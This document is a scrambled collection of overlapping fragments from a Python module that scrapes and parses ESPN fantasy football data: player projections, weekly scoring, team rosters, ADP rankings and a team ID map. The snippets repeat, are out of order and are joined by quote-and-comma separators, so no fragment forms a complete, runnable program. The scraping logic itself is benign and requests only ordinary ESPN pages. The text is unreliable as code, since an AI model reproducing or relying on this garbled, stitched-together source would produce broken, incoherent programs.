Returns: HTML string TODO: revise based on new URL \"\"\" pos =", "\"te\": 160, \"dst\": 0, \"k\": 40} if pos not in slot_categories.keys(): raise ValueError(\"invalid", "} return self.get(url, params=params) class Parser: \"\"\" Parse ESPN.com for football stats \"\"\"", "row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")}) try: player = {\"source\": \"espn\"} tds = row.find_all(\"td\") if len(tds)", "dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") if pos.lower() in [\"qb\",", "\"k\": 40} if pos not in slot_categories.keys(): raise ValueError(\"invalid pos {}\".format(pos)) if offset", "] = child.string.split()[1:3] elif isinstance(child, Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player)", "in [\"PPR\", \"STANDARD\"]: for rank_type in [\"rank\", \"auctionValue\"]: key = scoring_type.lower() + \"_\"", "Returns: HTML string TODO: revise based on new URL \"\"\" pos = pos.lower()", "if match: player[\"source_team_code\"] = match.group(1) # tds[2]: <td>Arkansas</td> player[\"college\"] = tds[2].text # add", "\"\"\" Gets season ADP data Args: season_year(int): 2018, 2019, etc. 
Returns: list: of", "18: \"NO\", 19: \"NYG\", 20: \"NYJ\", 21: \"Phi\", 22: \"Ari\", 23: \"Pit\", 24:", "\"wr\": 360, \"te\": 160, \"dst\": 0, \"k\": 40} if pos not in slot_categories.keys():", "+ vals): player[header] = val players.append(player) elif pos.lower() == \"k\": for row in", "adapt for dst results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\",", "@staticmethod def players_position(content, pos): \"\"\" Parses page of ESPN players by position Args:", "page of ESPN players by position Args: content: pos: Returns: list: of dict", "\"Jax\", 33: \"Bal\", 34: \"Hou\", } class Scraper(RequestScraper): \"\"\" Scrape ESPN.com for football", "in content[\"players\"]: tl_wanted = [ \"defaultPositionId\", \"firstName\", \"id\", \"lastName\", \"proTeamId\", ] api_player =", "9: \"GB\", 10: \"Ten\", 11: \"Ind\", 12: \"KC\", 13: \"Oak\", 14: \"LAR\", 15:", "= row.find_all(\"td\") if len(tds) != 8: continue player[\"source_player_position\"] = tds[2].text player[\"source_player_name\"] = link.text", "season_year, } else: params = {\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset} if week: params[\"scoringPeriodId\"] =", "in [\"qb\", \"rb\", \"wr\", \"te\", \"flex\"]: headers = [ \"pass_att\", \"pass_cmp\", \"pass_yds\", \"pass_td\",", "# name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] = tds[1].text link = row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")}) if link: match", "\"espn\"} tds = row.find_all(\"td\") if len(tds) != 8: continue player[\"source_player_position\"] = tds[2].text player[\"source_player_name\"]", "Returns: list of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") if", "ValueError: pass return players @staticmethod def weekly_scoring(content): \"\"\" Parses weekly scoring page Args:", "for row in soup.find_all(\"tr\"): link = row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")}) try: player = {\"source\":", "# tds[0]: rank 
player[\"source_position_rank\"] = tds[0].text # tds[1]: name/team/pos link, navstr = list(tds[1].children)[0:2]", "= parser else: self._p = Parser() def adp(self, season_year): \"\"\" Gets season ADP", "vals = [self._val(td.text) for td in tds[3:]] for header, val in zip(headers, tds[2].text.split(\"/\")", "pos): \"\"\" Parses page of ESPN players by position Args: content: pos: Returns:", "\"NYG\", 20: \"NYJ\", 21: \"Phi\", 22: \"Ari\", 23: \"Pit\", 24: \"LAC\", 25: \"SF\",", "child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results class Agent: \"\"\" Combines common scraping/parsing", "= {\"source\": \"espn\", \"source_player_position\": pos} tds = row.find_all(\"td\") # tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/ #", "week=0, offset=0): \"\"\" Gets page with projections by position Args: pos: str qb,", "+ rank_type try: api_player[key] = item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type] except KeyError: api_player[key] = None", "= { 1: \"Atl\", 2: \"Buf\", 3: \"Chi\", 4: \"Cin\", 5: \"Cle\", 6:", "\"Wsh\", 29: \"Car\", 30: \"Jax\", 33: \"Bal\", 34: \"Hou\", } class Scraper(RequestScraper): \"\"\"", "position, } return self.get(url, params=params) class Parser: \"\"\" Parse ESPN.com for football stats", "week: int 1, 2, 3 offset: int 0, 40, 80, etc. Returns: HTML", "def team_roster(content): \"\"\" Parses team roster page into list of player dict Args:", "weekly fantasy scoring page Args: season_year (int): 2017, 2016, etc. 
week (int): 1", "with other names/ids \"\"\" def __init__(self, source_name=\"espn\"): \"\"\" Args: source_name(str): either 'espn' or", "for item in content[\"players\"]: tl_wanted = [ \"defaultPositionId\", \"firstName\", \"id\", \"lastName\", \"proTeamId\", ]", "HTML string Returns: list of dict \"\"\" players = [] soup = BeautifulSoup(content,", "parser: self._p = parser else: self._p = Parser() def adp(self, season_year): \"\"\" Gets", "not in slot_categories.keys(): raise ValueError(\"invalid pos {}\".format(pos)) if offset > max_offset.get(pos): raise ValueError(\"invalid", "4: \"Cin\", 5: \"Cle\", 6: \"Dal\", 7: \"Den\", 8: \"Det\", 9: \"GB\", 10:", "\"Den\", 8: \"Det\", 9: \"GB\", 10: \"Ten\", 11: \"Ind\", 12: \"KC\", 13: \"Oak\",", "\"k\", \"QB\", \"RB\", \"WR\", \"TE\", \"K\", \"D/ST\", \"DST\", ]: if pos in [\"DST\",", "player[header] = val players.append(player) elif pos.lower() == \"k\": for row in soup.findAll(\"tr\", {\"class\":", "= {\"source\": \"espn\"} tds = row.find_all(\"td\") # tds[0]: rank player[\"source_position_rank\"] = tds[0].text #", "{}\".format(pos)) if offset > max_offset.get(pos): raise ValueError(\"invalid offset {}\".format(offset)) if offset % 40", "Args: pos(str): Returns: str \"\"\" if pos in [ \"qb\", \"rb\", \"wr\", \"te\",", "team_code): \"\"\" Gets list of NFL players from ESPN.com Args: team_code: str 'DEN',", "= tds[0].text # tds[1]: name/team/pos link, navstr = list(tds[1].children)[0:2] player[\"source_player_name\"] = link.text player[\"source_player_team\"],", "player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_dst(content): \"\"\"", "scoring_type in [\"PPR\", \"STANDARD\"]: for rank_type in [\"rank\", \"auctionValue\"]: key = scoring_type.lower() +", "def weekly_scoring_dst(content): \"\"\" Parses weekly scoring page for dst Args: content(str): HTML Returns:", "= BeautifulSoup(content, 
\"lxml\") tbl = soup.select(\"table#playertable_0\")[0] for row in tbl.find_all(\"tr\", {\"id\": re.compile(r\"plyr\")}): tds", "ESPN.com for football stats \"\"\" @staticmethod def _check_pos(pos): \"\"\" Makes sure pos is", "Site from sportscraper.scraper import RequestScraper FANTASY_TEAMS = { 1: \"Atl\", 2: \"Buf\", 3:", "= { \"slotCategoryId\": slot_categories[pos], \"startIndex\": offset, \"seasonId\": season_year, } else: params = {\"slotCategoryId\":", "Parser: \"\"\" Parse ESPN.com for football stats \"\"\" def __init__(self): \"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler())", "one column so have to remove & split vals = [self._val(td.text) for td", "player dict Args: content: HTML of espn nfl team roster page Returns: list", "football stats \"\"\" @staticmethod def _check_pos(pos): \"\"\" Makes sure pos is valid and", "\"\"\" @staticmethod def _check_pos(pos): \"\"\" Makes sure pos is valid and uppercase Args:", "\"D/ST\", \"DST\", ]: if pos in [\"DST\", \"dst\"]: pos = \"D/ST\" return pos.upper()", "HTML Returns: list: of dict \"\"\" # TODO: adapt for kicker results =", "# TODO: adapt for kicker results = [] headers = [ \"c_a\", \"pass_yds\",", "@staticmethod def weekly_scoring_k(content): \"\"\" Parses weekly scoring page for kickers Args: content (str):", "{\"source\": \"espn\", \"source_player_position\": pos} tds = row.find_all(\"td\") # tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a>", "player[\"source_team_code\"] = match.group(1) # tds[2]: <td>Arkansas</td> player[\"college\"] = tds[2].text # add to list", "} class Scraper(RequestScraper): \"\"\" Scrape ESPN.com for football stats \"\"\" @staticmethod def _check_pos(pos):", "else: params[\"seasonTotals\"] = \"true\" return self.get(url, params=params, encoding=\"latin1\") def team_roster(self, team_code): \"\"\" Gets", "name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] = tds[1].text link = 
row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")}) if link: match =", "6, \"dst\": 16, \"k\": 17} if position.lower() not in poscode: raise ValueError(\"invalid position:", "\"\"\" Gets page with all players by position Args: pos(str): qb, rb, wr,", "class Agent: \"\"\" Combines common scraping/parsing tasks \"\"\" def __init__(self, scraper=None, parser=None, cache_name=\"espn-agent\"):", "3 offset: int 0, 40, 80, etc. Returns: HTML string TODO: revise based", "_val(val): \"\"\" Converts non-numeric value to numeric 0 Args: val: Returns: number \"\"\"", "\"defaultPositionId\", \"firstName\", \"id\", \"lastName\", \"proTeamId\", ] api_player = {k: v for k, v", "{\"href\": re.compile(r\"/player/_/\")}) if link: match = re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if match: player[\"source_player_id\"] = match.group(1)", "default 'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper: self._s = scraper else: self._s = Scraper(cache_name=cache_name)", "\"\"\" content = self._s.adp(season_year) return self._p.adp(content) class Xref(Site): \"\"\" Cross-reference source players with", "{\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17} if", "vals): player[header] = val players.append(player) elif pos.lower() == \"k\": for row in soup.findAll(\"tr\",", "4, \"te\": 6, \"dst\": 16, \"k\": 17} if position.lower() not in poscode: raise", "source_name=\"espn\"): \"\"\" Args: source_name(str): either 'espn' or 'espn_fantasy' \"\"\" super().__init__() self.source_name = source_name", "projections(self, pos, season_year=None, week=0, offset=0): \"\"\" Gets page with projections by position Args:", "Creates Agent object Args: scraper(espn.Scraper): default None parser(espn.Parser): default None cache_name(str): default 'espn-agent'", "navstr = list(tds[1].children)[0:2] player[\"source_player_name\"] = link.text player[\"source_player_team\"], player[ \"source_player_position\" ] = navstr.split()[-2:] 
player[\"source_player_id\"]", "\"TE\", \"K\", \"D/ST\", \"DST\", ]: if pos in [\"DST\", \"dst\"]: pos = \"D/ST\"", "based on new URL \"\"\" pos = pos.lower() slot_categories = {\"qb\": 0, \"rb\":", "{}\".format(offset)) # https://fantasy.espn.com/football/players/projections url = \"http://games.espn.com/ffl/tools/projections?\" if season_year: params = { \"slotCategoryId\": slot_categories[pos],", "match = re.search(r\"name/(\\w+)/\", link[\"href\"]) if match: player[\"source_team_code\"] = match.group(1) # tds[2]: <td>Arkansas</td> player[\"college\"]", "[] soup = BeautifulSoup(content, \"lxml\") if pos.lower() in [\"qb\", \"rb\", \"wr\", \"te\", \"flex\"]:", "[] soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): link = row.find(\"a\", {\"href\":", "tds: player = dict(zip(headers, tds)) # name, team, position nametd = row.find(\"td\", {\"id\":", "pos not in slot_categories.keys(): raise ValueError(\"invalid pos {}\".format(pos)) if offset > max_offset.get(pos): raise", "parser=None, cache_name=\"espn-agent\"): \"\"\" Creates Agent object Args: scraper(espn.Scraper): default None parser(espn.Parser): default None", "Parser() def adp(self, season_year): \"\"\" Gets season ADP data Args: season_year(int): 2018, 2019,", "in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"} tds = row.find_all(\"td\") # tds[0]:", "football stats \"\"\" def __init__(self): \"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def _val(val): \"\"\" Converts", "if len(tds) != 8: continue player[\"source_player_position\"] = tds[2].text player[\"source_player_name\"] = link.text player[\"source_player_id\"] =", "\"\"\" if pos in [ \"qb\", \"rb\", \"wr\", \"te\", \"dst\", \"d/st\", \"k\", \"QB\",", "\"\"\" url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url, encoding=\"latin1\") def weekly_scoring(self, season_year, week, position): \"\"\"", "headers = [ \"c_a\", 
\"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec_rec\", \"rec_yds\", \"rec_td\",", "def weekly_scoring_k(content): \"\"\" Parses weekly scoring page for kickers Args: content (str): HTML", "None cache_name(str): default 'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper: self._s = scraper else: self._s", "position): \"\"\" Gets weekly fantasy scoring page Args: season_year (int): 2017, 2016, etc.", "= row.find(\"td\", {\"id\": re.compile(r\"playername\")}) for child in nametd.children: if isinstance(child, NavigableString): player[\"source_player_team\"], player[", "\"te\": 6, \"dst\": 16, \"k\": 17} if position.lower() not in poscode: raise ValueError(\"invalid", "else: raise ValueError(\"invalid position: {}\".format(pos)) def adp(self, season_year): \"\"\" Gets adp data Args:", "{}\".format(position)) # https://fantasy.espn.com/football/leaders url = \"http://games.espn.com/ffl/leaders?&\" params = { \"scoringPeriodId\": week, \"seasonId\": season_year,", "players.append(player) return players @staticmethod def team_roster(content): \"\"\" Parses team roster page into list", "with all players by position Args: pos(str): qb, rb, wr, te, k, etc.", "Agent object Args: scraper(espn.Scraper): default None parser(espn.Parser): default None cache_name(str): default 'espn-agent' \"\"\"", "classes = set(row.attrs.get(\"class\", [])) if class_matches.intersection(classes): player = {\"source\": \"espn\", \"source_player_position\": pos} tds", "{\"id\": re.compile(r\"playername\")}) for child in nametd.children: if isinstance(child, NavigableString): player[\"source_player_team\"], player[ \"source_player_position\" ]", "in slot_categories.keys(): raise ValueError(\"invalid pos {}\".format(pos)) if offset > max_offset.get(pos): raise ValueError(\"invalid offset", "Cross-reference source players with other names/ids \"\"\" def __init__(self, source_name=\"espn\"): \"\"\" Args: 
source_name(str):", "# this does include some basic fantasy data # espn_fantasy is mostly about", "fantasy scoring page Args: season_year (int): 2017, 2016, etc. week (int): 1 through", "except ValueError: pass return players @staticmethod def weekly_scoring(content): \"\"\" Parses weekly scoring page", "2: \"Buf\", 3: \"Chi\", 4: \"Cin\", 5: \"Cle\", 6: \"Dal\", 7: \"Den\", 8:", "weekly scoring page for kickers Args: content (str): HTML Returns: list: of dict", "slot_categories[pos], \"startIndex\": offset} if week: params[\"scoringPeriodId\"] = week else: params[\"seasonTotals\"] = \"true\" return", "for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"} tds = row.find_all(\"td\")", "ValueError(\"invalid pos {}\".format(pos)) if offset > max_offset.get(pos): raise ValueError(\"invalid offset {}\".format(offset)) if offset", "item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type] except KeyError: api_player[key] = None vals.append(api_player) return vals def projections(self,", "weekly_scoring_dst(content): \"\"\" Parses weekly scoring page for dst Args: content(str): HTML Returns: list:", "TODO: adapt for kicker results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\",", "season_year(int): 2018, 2019, etc. 
Returns: list: of dict \"\"\" content = self._s.adp(season_year) return", "return self.get_json(url) def players_position(self, pos): \"\"\" Gets page with all players by position", "(str): HTML Returns: list: of dict \"\"\" # TODO: adapt for kicker results", "\"K\", \"D/ST\", \"DST\", ]: if pos in [\"DST\", \"dst\"]: pos = \"D/ST\" return", "key = scoring_type.lower() + \"_\" + rank_type try: api_player[key] = item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type]", "\"Dal\", 7: \"Den\", 8: \"Det\", 9: \"GB\", 10: \"Ten\", 11: \"Ind\", 12: \"KC\",", "33: \"Bal\", 34: \"Hou\", } class Scraper(RequestScraper): \"\"\" Scrape ESPN.com for football stats", "self._s.adp(season_year) return self._p.adp(content) class Xref(Site): \"\"\" Cross-reference source players with other names/ids \"\"\"", "15: \"Mia\", 16: \"Min\", 17: \"NE\", 18: \"NO\", 19: \"NYG\", 20: \"NYJ\", 21:", "to numeric 0 Args: val: Returns: number \"\"\" if \"--\" in val: return", "\"\"\" if \"--\" in val: return 0 return val @staticmethod def adp(content): \"\"\"", "\"rec_td\", \"fantasy_points_ppr\", ] for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"}", "qb, rb, wr, te, k, etc. 
season_year: int 2017, 2016 week: int 1,", "url = \"http://games.espn.com/ffl/leaders?&\" params = { \"scoringPeriodId\": week, \"seasonId\": season_year, \"slotCategoryId\": position, }", "BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): class_matches = set([\"oddrow\", \"evenrow\"]) classes = set(row.attrs.get(\"class\",", "def players_position(self, pos): \"\"\" Gets page with all players by position Args: pos(str):", "encoding=\"latin1\") def weekly_scoring(self, season_year, week, position): \"\"\" Gets weekly fantasy scoring page Args:", "api_player[key] = None vals.append(api_player) return vals def projections(self, content, pos): \"\"\" Parses ESPN", "\"http://games.espn.com/ffl/leaders?&\" params = { \"scoringPeriodId\": week, \"seasonId\": season_year, \"slotCategoryId\": position, } return self.get(url,", "in one column so have to remove & split player[\"fantasy_points_ppr\"] = self._val(tds[-1].text) players.append(player)", "row.find_all(\"td\") # tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] = tds[0].text link = row.find(\"a\",", "team roster page into list of player dict Args: content: HTML of espn", "child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_dst(content): \"\"\" Parses weekly", "return results @staticmethod def weekly_scoring_k(content): \"\"\" Parses weekly scoring page for kickers Args:", "list: of dict \"\"\" # TODO: adapt for kicker results = [] headers", "parsed JSON \"\"\" url = ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return self.get_json(url) def players_position(self,", "navstr.split()[-2:] player[\"source_player_id\"] = link.attrs.get(\"playerid\") # loop through stats # they have attempts/completions in", "names/ids \"\"\" def __init__(self, 
source_name=\"espn\"): \"\"\" Args: source_name(str): either 'espn' or 'espn_fantasy' \"\"\"", "HTML of espn nfl team roster page Returns: list of dict \"\"\" players", "= {\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset} if week: params[\"scoringPeriodId\"] = week else: params[\"seasonTotals\"] =", "\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset, \"seasonId\": season_year, } else: params = {\"slotCategoryId\": slot_categories[pos], \"startIndex\":", "number \"\"\" if \"--\" in val: return 0 return val @staticmethod def adp(content):", "\"lxml\") tbl = soup.select(\"table#playertable_0\")[0] for row in tbl.find_all(\"tr\", {\"id\": re.compile(r\"plyr\")}): tds = [td.text", "match: player[\"source_player_id\"] = match.group(1) # tds[1]: <td><a href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] = tds[1].text", "elif isinstance(child, Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod", "tasks \"\"\" def __init__(self, scraper=None, parser=None, cache_name=\"espn-agent\"): \"\"\" Creates Agent object Args: scraper(espn.Scraper):", "\"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec_rec\", \"rec_yds\", \"rec_td\", \"rec_tar\", \"tpc\", \"fumble\", \"misc_td\", \"fpts\", ]", "str \"\"\" if pos in [ \"qb\", \"rb\", \"wr\", \"te\", \"dst\", \"d/st\", \"k\",", "{ \"slotCategoryId\": slot_categories[pos], \"startIndex\": offset, \"seasonId\": season_year, } else: params = {\"slotCategoryId\": slot_categories[pos],", "for scraping, parsing espn football data # this does include some basic fantasy", "class_matches.intersection(classes): player = {\"source\": \"espn\", \"source_player_position\": pos} tds = row.find_all(\"td\") # tds[0]: <a", "params = { \"slotCategoryId\": slot_categories[pos], \"startIndex\": offset, \"seasonId\": season_year, } else: 
params =", "\"\"\" Creates Agent object Args: scraper(espn.Scraper): default None parser(espn.Parser): default None cache_name(str): default", "f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return self.get_json(url) def players_position(self, pos): \"\"\" Gets page with all players", "\"k\": 17} max_offset = {\"qb\": 120, \"rb\": 240, \"wr\": 360, \"te\": 160, \"dst\":", "remove & split vals = [self._val(td.text) for td in tds[3:]] for header, val", "self.get(url, encoding=\"latin1\") def weekly_scoring(self, season_year, week, position): \"\"\" Gets weekly fantasy scoring page", "{\"source\": \"espn\"} tds = row.find_all(\"td\") if len(tds) != 8: continue player[\"source_player_position\"] = tds[2].text", "Xref(Site): \"\"\" Cross-reference source players with other names/ids \"\"\" def __init__(self, source_name=\"espn\"): \"\"\"", "<td>Arkansas</td> player[\"college\"] = tds[2].text # add to list players.append(player) return players @staticmethod def", "fantasy teams # NOTE: trouble accessing data in offseason # will have to", "some basic fantasy data # espn_fantasy is mostly about managing fantasy teams #", "link, navstr = list(tds[1].children)[0:2] player[\"source_player_name\"] = link.text player[\"source_player_team\"], player[ \"source_player_position\" ] = navstr.split()[-2:]", "tds[3:]] for header, val in zip(headers, tds[2].text.split(\"/\") + vals): player[header] = val players.append(player)", "int 2017, 2016 week: int 1, 2, 3 offset: int 0, 40, 80,", "URL \"\"\" poscode = {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\":", "row.find_all(\"td\") if len(tds) != 8: continue player[\"source_player_position\"] = tds[2].text player[\"source_player_name\"] = link.text player[\"source_player_id\"]", "soup = BeautifulSoup(content, \"lxml\") tbl = soup.select(\"table#playertable_0\")[0] for row in tbl.find_all(\"tr\", {\"id\": re.compile(r\"plyr\")}):", "import Site from sportscraper.scraper import RequestScraper FANTASY_TEAMS = { 1: \"Atl\", 2: 
\"Buf\",", "tds[0]: rank player[\"source_position_rank\"] = tds[0].text # tds[1]: name/team/pos link, navstr = list(tds[1].children)[0:2] player[\"source_player_name\"]", "Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results class Agent: \"\"\"", "\"\"\" Parses weekly scoring page Args: content (str): HTML Returns: list: of dict", "stats \"\"\" @staticmethod def _check_pos(pos): \"\"\" Makes sure pos is valid and uppercase", "= child.attrs.get(\"playerid\") results.append(player) return results class Agent: \"\"\" Combines common scraping/parsing tasks \"\"\"", "@staticmethod def weekly_scoring(content): \"\"\" Parses weekly scoring page Args: content (str): HTML Returns:", "11: \"Ind\", 12: \"KC\", 13: \"Oak\", 14: \"LAR\", 15: \"Mia\", 16: \"Min\", 17:", "list(tds[1].children)[0:2] player[\"source_player_name\"] = link.text player[\"source_player_team\"], player[ \"source_player_position\" ] = navstr.split()[-2:] player[\"source_player_id\"] = link.attrs.get(\"playerid\")", "player[\"college\"] = tds[2].text # add to list players.append(player) return players @staticmethod def team_roster(content):", "19: \"NYG\", 20: \"NYJ\", 21: \"Phi\", 22: \"Ari\", 23: \"Pit\", 24: \"LAC\", 25:", "40, 80, etc. 
Returns: HTML string TODO: revise based on new URL \"\"\"", "== \"k\": for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"} tds", "nametd = row.find(\"td\", {\"id\": re.compile(r\"playername\")}) for child in nametd.children: if isinstance(child, NavigableString): player[\"source_player_team\"],", "2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] = tds[0].text link = row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")}) if link: match =", "player[\"source_team_name\"] = tds[1].text link = row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")}) if link: match = re.search(r\"name/(\\w+)/\",", "position nametd = row.find(\"td\", {\"id\": re.compile(r\"playername\")}) for child in nametd.children: if isinstance(child, NavigableString):", "= [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec_rec\",", "Returns: str \"\"\" if pos in [ \"qb\", \"rb\", \"wr\", \"te\", \"dst\", \"d/st\",", "return self._p.adp(content) class Xref(Site): \"\"\" Cross-reference source players with other names/ids \"\"\" def", "\"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17} if position.lower() not", "\"rec_tar\", \"tpc\", \"fumble\", \"misc_td\", \"fpts\", ] soup = BeautifulSoup(content, \"lxml\") tbl = soup.select(\"table#playertable_0\")[0]", "elif isinstance(child, Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results class", "isinstance(child, Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results class Agent:", "= self._s.adp(season_year) return self._p.adp(content) class Xref(Site): \"\"\" Cross-reference source players with other names/ids", "= [] for item in content[\"players\"]: tl_wanted = [ \"defaultPositionId\", \"firstName\", \"id\", \"lastName\",", "Agent: 
\"\"\" Combines common scraping/parsing tasks \"\"\" def __init__(self, scraper=None, parser=None, cache_name=\"espn-agent\"): \"\"\"", "pos.lower() slot_categories = {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16,", "results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\",", "of player dict Args: content: HTML of espn nfl team roster page Returns:", "re.compile(r\"playername\")}) for child in nametd.children: if isinstance(child, NavigableString): player[\"source_player_team\"], player[ \"source_player_position\" ] =", "[self._val(td.text) for td in tds[3:]] for header, val in zip(headers, tds[2].text.split(\"/\") + vals):", "URL \"\"\" pos = pos.lower() slot_categories = {\"qb\": 0, \"rb\": 2, \"wr\": 4,", "season approaches \"\"\" import logging import re from bs4 import BeautifulSoup, NavigableString, Tag", "def team_roster(self, team_code): \"\"\" Gets list of NFL players from ESPN.com Args: team_code:", "Args: content: HTML string Returns: list of dict \"\"\" players = [] soup", "players_position(content, pos): \"\"\" Parses page of ESPN players by position Args: content: pos:", "Returns: list: of dict \"\"\" results = [] headers = [ \"c_a\", \"pass_yds\",", "= BeautifulSoup(content, \"lxml\") if pos.lower() in [\"qb\", \"rb\", \"wr\", \"te\", \"flex\"]: headers =", "= link.text player[\"source_player_team\"], player[ \"source_player_position\" ] = navstr.split()[-2:] player[\"source_player_id\"] = link.attrs.get(\"playerid\") # loop", "\"\"\" Scrape ESPN.com for football stats \"\"\" @staticmethod def _check_pos(pos): \"\"\" Makes sure", "BeautifulSoup, NavigableString, Tag from namematcher.xref import Site from sportscraper.scraper import RequestScraper FANTASY_TEAMS =", "80, etc. 
Returns: HTML string TODO: revise based on new URL \"\"\" pos", "to remove & split player[\"fantasy_points_ppr\"] = self._val(tds[-1].text) players.append(player) else: pass return players @staticmethod", "for td in tds[3:]] for header, val in zip(headers, tds[2].text.split(\"/\") + vals): player[header]", "12: \"KC\", 13: \"Oak\", 14: \"LAR\", 15: \"Mia\", 16: \"Min\", 17: \"NE\", 18:", "nfl team roster page Returns: list of dict \"\"\" players = [] soup", "Args: season_year(int): 2018, 2019, etc. Returns: list: of dict \"\"\" content = self._s.adp(season_year)", "ADP Args: content: Returns: list of dict \"\"\" vals = [] for item", "column so have to remove & split vals = [self._val(td.text) for td in", "14: \"LAR\", 15: \"Mia\", 16: \"Min\", 17: \"NE\", 18: \"NO\", 19: \"NYG\", 20:", "\"\"\" pos = pos.lower() slot_categories = {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\":", "\"rec_td\", \"rec_tar\", \"tpc\", \"fumble\", \"misc_td\", \"fpts\", ] soup = BeautifulSoup(content, \"lxml\") tbl =", "# 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] = tds[0].text link = row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")}) if link: match", "\"espn\", \"source_player_position\": pos} tds = row.find_all(\"td\") # tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"]", "season_year: params = { \"slotCategoryId\": slot_categories[pos], \"startIndex\": offset, \"seasonId\": season_year, } else: params", "season_year(int): 2019, etc. 
Returns: dict: parsed JSON \"\"\" url = ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\"", "link: match = re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if match: player[\"source_player_id\"] = match.group(1) # tds[1]: <td><a", "if scraper: self._s = scraper else: self._s = Scraper(cache_name=cache_name) if parser: self._p =", "player[\"source_player_team\"], player[ \"source_player_position\" ] = navstr.split()[-2:] player[\"source_player_id\"] = link.attrs.get(\"playerid\") # loop through stats", "logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def _val(val): \"\"\" Converts non-numeric value to numeric 0 Args: val:", "val: Returns: number \"\"\" if \"--\" in val: return 0 return val @staticmethod", "\"startIndex\": offset} if week: params[\"scoringPeriodId\"] = week else: params[\"seasonTotals\"] = \"true\" return self.get(url,", "projections by position Args: pos: str qb, rb, wr, te, k, etc. season_year:", "string \"\"\" url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url, encoding=\"latin1\") def weekly_scoring(self, season_year, week, position):", "stats # they have attempts/completions in one column so have to remove &", "\"rec_yds\", \"rec_td\", \"rec_tar\", \"tpc\", \"fumble\", \"misc_td\", \"fpts\", ] soup = BeautifulSoup(content, \"lxml\") tbl", "isinstance(child, Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def", "34: \"Hou\", } class Scraper(RequestScraper): \"\"\" Scrape ESPN.com for football stats \"\"\" 